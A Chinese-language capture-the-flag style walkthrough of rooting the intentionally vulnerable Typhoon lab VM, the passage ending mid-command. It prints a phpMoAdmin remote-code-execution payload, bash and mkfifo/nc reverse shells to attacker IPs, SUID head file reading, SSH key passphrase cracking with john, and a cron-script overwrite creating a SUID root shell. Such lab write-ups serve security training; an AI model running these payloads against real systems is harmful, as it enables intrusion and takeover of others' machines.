|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
2049/tcp  open  nfs
3306/tcp  open  mysql
5432/tcp  open  postgresql
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
6379/tcp  open  redis
8080/tcp  open  http-proxy
| http-enum: 
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
27017/tcp open  mongod
34114/tcp open  unknown
34329/tcp open  unknown
41559/tcp open  unknown
43004/tcp open  unknown
49357/tcp open  unknown
MAC Address: 08:00:27:2D:C0:8F (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

Nmap done: 1 IP address (1 host up) scanned in 333.29 seconds

先从简单的开始尝试吧

21 端口匿名登录

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ ftp 192.168.56.121
Connected to 192.168.56.121.
220 (vsFTPd 3.0.2)
Name (192.168.56.121:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -liah
229 Entering Extended Passive Mode (|||6562|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        129          4096 Oct 23  2018 .
drwxr-xr-x    2 0        129          4096 Oct 23  2018 ..
226 Directory send OK.

没有文件，但或许可以上传？试一试

ftp> binary
200 Switching to Binary mode.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||60611|).
553 Could not create file.

不能创建文件，暂时没思路，看看别的端口

2049 端口 nfs

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ showmount -e 192.168.56.121                 
Export list for 192.168.56.121:
/typhoon *
┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ sudo mount -t nfs 192.168.56.121:/typhoon /tmp/infosec
┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls -liah
total 28K
 923939 drwxr-xr-x  2 root root 4.0K Oct 22  2018 .
4194305 drwxrwxrwt 17 root root  12K Jul  2 08:39 ..
 923940 -rw-r--r--  1 root root   24 Oct 22  2018 .secret
 923941 -rw-r--r--  1 root root   63 Oct 24  2018 secret
 923942 -rw-------  1 root root 1.8K Oct 22  2018 .secret.rsa

目录下有三个文件，依次查看，不过 .secret.rsa 没有查看权限

┌──(kali㉿kali)-[/tmp/infosec]
└─$ cat .secret    
belong to typhoon user.

┌──(kali㉿kali)-[/tmp/infosec]
└─$ cat secret 
test file
<rec0nm4st3r> R3c0n_m4steeeee3er_fl4g </rec0nm4st3r>
┌──(kali㉿kali)-[/tmp/infosec]
└─$ cat .secret.rsa 
cat: .secret.rsa: Permission denied

leet 网络用语，还原后得到 recon_master_flag，emmmm 看来只是个彩蛋。那看来 nfs 也没什么收获，这个权限有限的文件，等 getshell 后或许可以考虑。

80 端口

nmap 的扫描结果中，80 端口有个 robots.txt 文件，其中给了/mongoadmin/这样一个路径，看看吧

首页没什么东西，感觉是个广告，源码里也没收获。看看 mongoadmin 目录

似乎是个可视化的管理工具，点击 stats 得到如下的信息：

phpMoAdmin 漏洞

里面给出了 phpMoAdmin: 1.0.9，搜一搜有没有漏洞

第一个链接给出了利用方法，这里只摘出 PoC

curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

接下来替换其中的命令尝试反弹 shell

┌──(kali㉿kali)-[~/tools]
└─$ curl "http://192.168.56.121/mongoadmin/index.php" -d "object=1;system('cd /tmp;/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/4242 0>&1"');exit"
zsh: no such file or directory: /dev/tcp/192.168.56.106/4242

失败，应该是其中某些字符的问题，那就尝试 base64 编码再解码吧

┌──(kali㉿kali)-[~]
└─$ echo '/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/4242 0>&1"' |base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQyNDIgMD4m
MSIK
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQyNDIgMD4mMSIK" | base64 -d
/bin/bash -c "bash -i >& /dev/tcp/192.168.56.106/4242 0>&1"

base64编码以 getshell

将编码再解码的结果通过管道传递给 bash

┌──(kali㉿kali)-[~/tools]
└─$ curl "http://192.168.56.121/mongoadmin/index.php" -d "object=1;system('echo "L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMTA2LzQyNDIgMD4mMSIK" | base64 -d | bash');exit"

提前开启监听，反弹 shell 成功

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.121] 53121
bash: cannot set terminal process group (2151): Inappropriate ioctl for device
bash: no job control in this shell
www-data@typhoon:/var/www/html/mongoadmin$ 
www-data@typhoon:/var/www/html/mongoadmin$ whoami
whoami
www-data
www-data@typhoon:/var/www/html/mongoadmin$ ls
ls
index.php
www-data@typhoon:/var/www/html/mongoadmin$ ip a  
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:2d:c0:8f brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.121/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe2d:c08f/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:bc:90:00:31 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 8e:16:41:6c:32:c8 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
       valid_lft forever preferred_lft forever
www-data@typhoon:/var/www/html/mongoadmin$uname -a
uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@typhoon:/var/www/html/mongoadmin$ python -c 'import pty;pty.spawn("/bin/bash");'
<tml/mongoadmin$ python -c 'import pty;pty.spawn("/bin/bash");'              
www-data@typhoon:/var/www/html/mongoadmin$ export TERM=xterm-color
export TERM=xterm-color
www-data@typhoon:/var/www/html/mongoadmin$ 

提权

基础信息收集

进行信息收集，先看当前目录下的 index.php，确定没有敏感信息后，在系统中进行寻找

www-data@typhoon:/var/www/html/mongoadmin$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
typhoon:x:1000:1000:typhoon,,,:/home/typhoon:/bin/bash
admin:x:1001:1001:,,,:/home/admin:/bin/bash
postfixuser:x:1002:1002:,,,:/home/postfixuser:/bin/bash
www-data@typhoon:/var/www/html/mongoadmin$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

passwd 文件和 crontab 文件没什么收获

home 目录信息收集

进入 home 目录看看

www-data@typhoon:/home$ ls
ls
admin  postfixuser  typhoon
www-data@typhoon:/home$ cd admin
cd admin
www-data@typhoon:/home/admin$ ls -liah
ls -liah
total 32K
917516 drwxr-xr-x 4 admin admin 4.0K Oct 22  2018 .
917505 drwxr-xr-x 5 root  root  4.0K Oct 23  2018 ..
917529 -rw------- 1 admin admin   40 Oct 25  2018 .bash_history
917518 -rw-r--r-- 1 admin admin  220 Oct 22  2018 .bash_logout
917517 -rw-r--r-- 1 admin admin 3.6K Oct 22  2018 .bashrc
917520 drwx------ 2 admin admin 4.0K Oct 22  2018 .cache
917519 -rw-r--r-- 1 admin admin  675 Oct 22  2018 .profile
917527 drwxr-xr-x 2 root  root  4.0K Oct 25  2018 .ssh
917522 -rw-r--r-- 1 admin admin    0 Oct 22  2018 .sudo_as_admin_successful
www-data@typhoon:/home/admin$ cd .ssh
cd .ssh
www-data@typhoon:/home/admin/.ssh$ ls -liah
ls -liah
total 12K
917527 drwxr-xr-x 2 root  root  4.0K Oct 25  2018 .
917516 drwxr-xr-x 4 admin admin 4.0K Oct 22  2018 ..
932596 -rw-r--r-- 1 admin admin   42 Oct 24  2018 secr3t
www-data@typhoon:/home/admin/.ssh$ cat secr3t
cat secr3t
<h0h0h0>

ph00n_typ_p0st_flag!

</h0h0h0>
www-data@typhoon:/home/admin/.ssh$ cd ../../postfixuser
cd ../../postfixuser
www-data@typhoon:/home/postfixuser$ ls -liah
ls -liah
total 20K
932184 drwxr-xr-x 2 postfixuser postfixuser 4.0K Oct 23  2018 .
917505 drwxr-xr-x 5 root        root        4.0K Oct 23  2018 ..
932186 -rw-r--r-- 1 postfixuser postfixuser  220 Oct 23  2018 .bash_logout
932185 -rw-r--r-- 1 postfixuser postfixuser 3.6K Oct 23  2018 .bashrc
932187 -rw-r--r-- 1 postfixuser postfixuser  675 Oct 23  2018 .profile
www-data@typhoon:/home/postfixuser$ cd ../../typhoon
cd ../../typhoon
www-data@typhoon:/typhoon$ ls -liah
ls -liah
total 20K
923939 drwxr-xr-x  2 root root 4.0K Oct 23  2018 .
     2 drwxr-xr-x 25 root root 4.0K Oct 24  2018 ..
923940 -rw-r--r--  1 root root   24 Oct 23  2018 .secret
923942 -rw-------  1 root root 1.8K Oct 23  2018 .secret.rsa
923941 -rw-r--r--  1 root root   63 Oct 24  2018 secret
www-data@typhoon:/typhoon$ cat .secret.rsa
cat .secret.rsa
cat: .secret.rsa: Permission denied
www-data@typhoon:/typhoon$ cat .secret
cat .secret
belong to typhoon user.
www-data@typhoon:/typhoon$ cat secret
cat secret
test file
<rec0nm4st3r> R3c0n_m4steeeee3er_fl4g </rec0nm4st3r>

我们比较感兴趣的 .secret.rsa 文件没有读取权限，看看 s 权限文件有没有可以帮忙的

www-data@typhoon:/var/www/html/cms$ find / -type f -perm -04000 -ls 2>/dev/null
<tml/cms$ find / -type f -perm -04000 -ls 2>/dev/null                        
 14223   20 -rwsr-sr-x   1 libuuid  libuuid     18904 Jun  3  2014 /usr/sbin/uuidd
 14192  336 -rwsr-xr--   1 root     dip        343168 Jan 23  2013 /usr/sbin/pppd
   123   40 -rwsr-xr-x   1 root     root        39584 Mar 24  2014 /usr/bin/head
   184   32 -rwsr-xr-x   1 root     root        32464 Feb 17  2014 /usr/bin/newgrp
    44   44 -rwsr-xr-x   1 root     root        41336 Feb 17  2014 /usr/bin/chsh
 14475   16 -rwsr-xr-x   1 root     lpadmin     14336 Jul 18  2014 /usr/bin/lppasswd
 14407   24 -rwsr-xr-x   1 root     root        23304 Feb 11  2014 /usr/bin/pkexec
    41   48 -rwsr-xr-x   1 root     root        46424 Feb 17  2014 /usr/bin/chfn
 14283   52 -rwsr-sr-x   1 daemon   daemon      51464 Oct 21  2013 /usr/bin/at
   115   68 -rwsr-xr-x   1 root     root        68152 Feb 17  2014 /usr/bin/gpasswd
   196   48 -rwsr-xr-x   1 root     root        47032 Feb 17  2014 /usr/bin/passwd
 14168   76 -rwsr-xr-x   1 root     root        75256 Oct 21  2013 /usr/bin/mtr
   302  152 -rwsr-xr-x   1 root     root       155008 Feb 10  2014 /usr/bin/sudo
 14642   88 -rwsr-sr-x   1 root     mail        89216 Oct 21  2013 /usr/bin/procmail
 14691 2144 -rwsr-xr-x   1 root     root      2191736 Jan  2  2014 /usr/bin/vim.basic
 14141   24 -rwsr-xr-x   1 root     root        23104 May  8  2014 /usr/bin/traceroute6.iputils
  1023   12 -rwsr-xr-x   1 root     root        10344 Apr 12  2014 /usr/lib/pt_chown
144019  432 -rwsr-xr-x   1 root     root       440416 May 12  2014 /usr/lib/openssh/ssh-keysign
532019   12 -rwsr-xr-x   1 root     root        10528 Jun 11  2012 /usr/lib/authbind/helper
270214   16 -rwsr-xr-x   1 root     root        14768 Feb 11  2014 /usr/lib/policykit-1/polkit-agent-helper-1
 12275  304 -rwsr-xr--   1 root     messagebus   310800 Jul  3  2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   392   12 -rwsr-xr-x   1 root     root        10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
790141   36 -rwsr-xr-x   1 root     root        35608 Jun 28  2013 /sbin/mount.cifs
804667   92 -rwsr-xr-x   1 root     root        94168 Nov  6  2015 /sbin/mount.nfs
658417   32 -rwsr-xr-x   1 root     root        30800 Dec 16  2013 /bin/fusermount
655433   44 -rwsr-xr-x   1 root     root        44680 May  8  2014 /bin/ping6
655419   96 -rwsr-xr-x   1 root     root        94792 Jun  3  2014 /bin/mount
655432   44 -rwsr-xr-x   1 root     root        44168 May  8  2014 /bin/ping
655452   40 -rwsr-xr-x   1 root     root        36936 Feb 17  2014 /bin/su
655460   68 -rwsr-xr-x   1 root     root        69120 Jun  3  2014 /bin/umount

head 文件 SUID 任意文件读取 ssh 密钥

head 文件具有 s 权限，根据 gtfobins 可以实现任意文件读取

www-data@typhoon:/typhoon$ head -c1G .secret.rsa
head -c1G .secret.rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,C5D65028BD98AC3E19489791F67CA768

/HkN7JJC6GUhdC9QqGQENXBZ4gmSFyNf3FQujcAG7FudOttBNb5uwYznR/fUHQ3Y
zySvHRxesWPSmbH+JnYZabS6J5BfNVLjo6GI/+M0uauh6g7o5FpgVQV1aezGf7VE
yH1HBMUarF2ei2ipxPI4bDTBIAOeec9HExagtzHTfryHQOD8qzglUTXRiEYP4/nz
y5akLWJp0aicgw8VzqA6JuRYgFvpaV2V7OLUEIwITpxP2q1xrEATY+N9ASM+LIUF
hwLfqCxinnzd5ObuF474qluHa2U1IoIFgOjxvQXzN1s6wqIUWPcV2w21QzoJ/cJf
Ro5nYZkygcoAHFB1ioQjPHD/HA8wjAPxyP5L1a1zR/PdsxcqqABH7TOJHLVT1ZYa
Koh5cmvch9nzTkowQpLnnOPF6smWIYAF6EzLx4Yx1E93w+0Fvvlq6ptRO+ZcNMhy
T3s31tqELLM/UbjR3O/dXOVXZuSCPG6okuy7FJ9xAW8k24FmITaHENaIYYzT74Xo
fTZjzbwY6QnSb7L+cy70r8CRBi0ESFWyEs2IWyWe8CrsZWtXLkl6O9FVE1ME1geB
UaonqZeIfG/fFlsXZTI1jYLvDC3yK1VBdb/fxqZTx+z10KenaKZEvM5IdlS8iBnv
Wtbl7v1CrTc9DL924Ul3u1sIhiKvBcu4wtoSEyUcwL08yyVJLrGr5GiKn98ZWECX
CAeXPUG2UCNQCYXXsE85u6TBVPGVlsETGtYLvRMwJAtAs79NZbuqIFXmQNGUEP8P
nLuw0cdit7sQT6AhIlmgXaqOfjKSS8gfOhVo5sHrvQTshjee0VD8Zgerqql0nqez
/yN5kLVn+XWx7SLBHmZnvatFY1KbT3j+y0Cw1kB/ckX+5Ui5fZH3ojauNA+Q5Gtt
5rfS4NeAaOYbY5ris+9zprWQ6wI8Yw82psN/sSqI4dVsv9asVkQ7/U7JD7mEEtal
u3BuhzhWMHaf+7elorzBTcTs+dTQBGh+wIRGxmhclL5tN7VQ+WJQRKp3b761LnYC
LrsWJIpqmvAEpSlvkD01erLu8yUDV2oCC4Y59+1f/xDhX3Qzgy3PYnMTlz7+YVXx
klfjpXFgZNJS+H1D8BWR22rkMwQ3x2ylq3QuL8JmAbEAzzUSBXPQY7IQpy8IQSbh
XhAopk52jhC3BZ+Pe1wI84AztSwCIcKrnJkoe2lsIu5gOQnCg91DQQqUe+G9TC+o
wDXxZMBYWsuZxQ9pN3EMto3iNedkDlMfps6ElplJS6Ci3IGtR2ceHsw/r11j+46j
zoM6pBTr8EGDjzintA9a7MhFZ/afXSRYOfxIZA6ijvc21mT838LMeQOHw414t4o7
IfpyWmlkfLNJSeWA9KcQ2t+kcM0VuTW0OAHtiNn6qTzClsryBaT2LFSNyMwIRt0p
21zYncZu5xc33XwEFZyfi3s/1K+Xw0x4rYqWaGTXQbfXciQgHqGTP0epA54/a+pg
edJ7yiGoUAOTvE82vghvTS3Qa9+jSvgGg1m1i1a0bxWT+7YSSD2Io1n+N0mDheAG
KCuixP7PfjsNiYLmZoBJIQ30WA1r+4HCQXHDU4o1zpJKy69rOMPyK28MRqI/Kf6X
-----END RSA PRIVATE KEY-----

将上述私钥写入本地文件 sshkey 中，ssh 私钥登录试试

ssh -i sshkey typhoon@192.168.56.121

john 爆破 ssh 密钥口令

但是提示需要口令，那就 john 爆破吧，爆破前使用 ssh2john 命令来进行格式转换，将文件写入 rsa_hash

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ ssh2john sshkey > rsa_hash

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash 
sshkey:789456123

1 password hash cracked, 0 left

爆破得到结果，使用密钥登录

┌──(kali㉿kali)-[~/Downloads/typhoon]
└─$ ssh -i sshkey typhoon@192.168.56.121     
    d888888b db    db d8888b. db   db  .d88b.   .d88b.  d8b   db 
    `~~88~~' `8b  d8' 88  `8D 88   88 .8P  Y8. .8P  Y8. 888o  88 
       88     `8bd8'  88oodD' 88ooo88 88    88 88    88 88V8o 88 
       88       88    88~~~   88~~~88 88    88 88    88 88 V8o88 
       88       88    88      88   88 `8b  d8' `8b  d8' 88  V888 
       YP       YP    88      YP   YP  `Y88P'   `Y88P'  VP   V8P 
                                                             
                 Vulnerable VM By PRISMA CSI - www.prismacsi.com

WARNING:  Unauthorized access to this system is forbidden and will be
prosecuted by law. By accessing this system, you agree that your actions
may be monitored if unauthorized usage is suspected.

                This is a joke of course :))
                Please hack me!

-----------------------------------------------------------------------
Enter passphrase for key 'sshkey': 
sign_and_send_pubkey: no mutual signature supported
typhoon@192.168.56.121\'s password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jul  2 20:10:31 EEST 2023

  System load:  0.0                Users logged in:        0
  Usage of /:   18.9% of 17.34GB   IP address for eth0:    192.168.56.121
  Memory usage: 40%                IP address for docker0: 172.17.0.1
  Swap usage:   0%                 IP address for virbr0:  192.168.122.1
  Processes:    181

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sun Jul  2 20:10:31 2023 from 192.168.56.106

有个必要有意思的事情，似乎是签名算法不匹配的问题，最后还是要输入密码，而口令恰好也是密码

可写文件列表

s 权限的文件列表和 www-data用户相同 ，因此看看可写文件列表

typhoon@typhoon:/var/www/html$ find / -type f -writable -not -path "/var*" -not -path "/proc*" -not -path "/sys*" 2>/dev/null
/tmp/7ff18ca11a1a43036e852fb2c82c62aa.dat
/tmp/b5caab02810ae00ce47f27a6151ab3d2.dat
/tmp/f71487e6e9c666dc5b99e37305c00db5.dat
/tmp/f0d37d8381109e98099ecb474141283a.dat
/tmp/c7007124bd83d0879dc799c95d5b219e.dat
/tmp/8c10a35add3f21e11383c7911852072e.dat
/tmp/a119d9ddd9ebcf658e28eac9773d7c07.dat
/tmp/65d9383ff514cbd01ac65e38806095d7.dat
/home/typhoon/.bashrc
/home/typhoon/.ssh/id_rsa
/home/typhoon/.ssh/id_rsa.pub
/home/typhoon/.ssh/known_hosts
/home/typhoon/.mysql_history
/home/typhoon/.cache/motd.legal-displayed
/home/typhoon/.bash_logout
/home/typhoon/.bash_history
/home/typhoon/.profile
/tab/script.sh

可写文件列表中看到有个/tab/script.sh 文件，看看这个文件的基本信息

typhoon@typhoon:~$ ls -liah /tab/script.sh
536243 -rwxrwxrwx 1 root root 68 Oct 24  2018 /tab/script.sh
typhoon@typhoon:~$ cat /tab/script.sh
echo "Typhoon is UP!"

#<typh00n!> P0st_3xpl01t3R_flaqGq <typhoon!>

竟然有个 root 属主的所有用户可读写的 sh 文件，那就简单了，反弹 shell 或者复制 bash 后赋予 s 权限

typhoon@typhoon:~$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" >/tab/script.sh
typhoon@typhoon:~$ /tab/script.sh

这样我们就获得了一个 s 权限的文件

typhoon@typhoon:/tmp$ ls -liah
total 1.1M
655482 drwxrwxrwt  7 root     root     4.0K Jul  3 01:16 .
     2 drwxr-xr-x 25 root     root     4.0K Oct 24  2018 ..
667536 -rw-rw-rw-  1 www-data www-data   33 Jul  2 17:59 65d9383ff514cbd01ac65e38806095d7.dat
667553 -rw-rw-rw-  1 www-data www-data    6 Jul  2 17:59 7ff18ca11a1a43036e852fb2c82c62aa.dat
667546 -rw-rw-rw-  1 www-data www-data   33 Jul  2 17:59 8c10a35add3f21e11383c7911852072e.dat
667550 -rw-rw-rw-  1 www-data www-data    6 Jul  2 17:59 a119d9ddd9ebcf658e28eac9773d7c07.dat
667549 -rw-rw-rw-  1 www-data www-data    6 Jul  2 17:59 b5caab02810ae00ce47f27a6151ab3d2.dat
667555 -rwsr-sr-x  1 root     root     994K Jul  2 20:33 bash
667552 -rw-rw-rw-  1 www-data www-data    6 Jul  2 17:59 c7007124bd83d0879dc799c95d5b219e.dat
667548 -rw-rw-rw-  1 www-data www-data 8.2K Jul  2 17:59 f0d37d8381109e98099ecb474141283a.dat
667547 -rw-rw-rw-  1 www-data www-data   28 Jul  2 17:59 f71487e6e9c666dc5b99e37305c00db5.dat
667534 prw-r--r--  1 www-data www-data    0 Jul  2 17:22 foo
665597 drwxr-xr-x  2 tomcat7  tomcat7  4.0K Jul  2 02:42 hsperfdata_tomcat7
659034 drwxrwxrwt  2 root     root     4.0K Jul  2 02:42 .ICE-unix
659035 srwx------  1 mongodb  mongodb     0 Jul  2 02:42 mongodb-27017.sock
667554 -rw-------  1 root     typhoon  4.0K Jul  2 20:37 .test.swp
665596 drwxr-xr-x  2 tomcat7  root     4.0K Jul  2 02:42 tomcat7-tomcat7-tmp
667551 drwxrwxrwx  2 www-data www-data 4.0K Jul  2 17:59 translations
658262 drwxrwxrwt  2 root     root     4.0K Jul  2 02:42 .X11-unix

typhoon@typhoon:/tmp$ ./bash -p
bash-4.3# whoami
root
bash-4.3# id
uid=1000(typhoon) gid=1000(typhoon) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),112(sambashare),125(libvirtd),1000(typhoon)
bash-4.3# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:2d:c0:8f brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.121/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe2d:c08f/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:bc:90:00:31 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 8e:16:41:6c:32:c8 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
       valid_lft forever preferred_lft forever
bash-4.3# uname -a
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
bash-4.3# cd /root
bash-4.3# ls
root-flag
bash-4.3# cat root-flag 
<Congrats!>

Typhoon_r00t3r!

</Congrats!>

不过这里有个疑问，实际上我第一次运行脚本的时候，得到的文件的属主是 typhoon，我甚至删去了/tmp/bash，但是最后又莫名奇妙多了个 root 属主的 bash 文件，比较疑惑，等回头重新导入下靶机，然后尝试复现一下，贴一下问题记录

文件的修改时间只相差了 3 min

bash-4.3# ls -liah bash
667555 -rwsr-sr-x 1 root root 994K Jul  2 20:33 bash
bash-4.3# stat bash
  File: ‘bash’
  Size: 1017016         Blocks: 1992       IO Block: 4096   regular file
Device: fc00h/64512d    Inode: 667555      Links: 1
Access: (6755/-rwsr-sr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2023-07-02 21:09:27.916683000 +0300
Modify: 2023-07-02 20:33:01.148683000 +0300
Change: 2023-07-02 20:33:01.152683000 +0300
 Birth: -

看不到文件的创建时间，猜测这个脚本可能是被定时执行了。还可以反弹shell

echo "mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.27.187 8888 >/tmp/f" > script.sh
nc -vlp 8888

补充

• 红队渗透测试之Typhoon——通过十种不同方法拿下 - 网络攻防 - 网信安全世界-中国网信安全领域技术交流和知识分享平台 (infosecworld.cn)

我尝试了 drupal_drupalgeddon2，使用 msf 可以直接 getshell。以下是文章中提到的我没有尝试过的方法

• OpenSSH 2.3 < 7.7 - Username Enumeration 用户名枚举，然后使用 hydra 进行爆破
• phpmoadm 信息泄露

• LotusCMS 漏洞利用：直接使用脚本利用失败，可能是靶机 nc 没有 -e 参数吧，不过文章里用 msf 成功了

• Tomcat 漏洞利用：尝试使用默认账户登录 tomcat/tomcat，登录成功，使用 tomcat_mgr_upload 漏洞

• Shellshock 漏洞利用：nikto 漏洞扫描发现/cgi-bin/test.sh 存在 shellshock 漏洞

• postgres_login 爆破，登录成功后进行文件读写来反弹 shell

• linux 版永恒之蓝：Samba 3.5+ <4.6.4 <4.5.10 <4.4.14 CVE-2017-7494

• 25 端口 DNS 域传送信息泄露：发现子域名，依次查看进而得到某个子域名下存在 WebCalendar v1.2.4 (08 Aug 2011)，存在漏洞

  ┌──(kali㉿kali)-[~/Downloads/typhoon]
  └─$ dig @192.168.56.122 -t axfr typhoon.local                       
  
  DiG 9.18.13-1-Debian @192.168.56.122 -t axfr typhoon.local
  ; (1 server found)
  ;; global options: +cmd
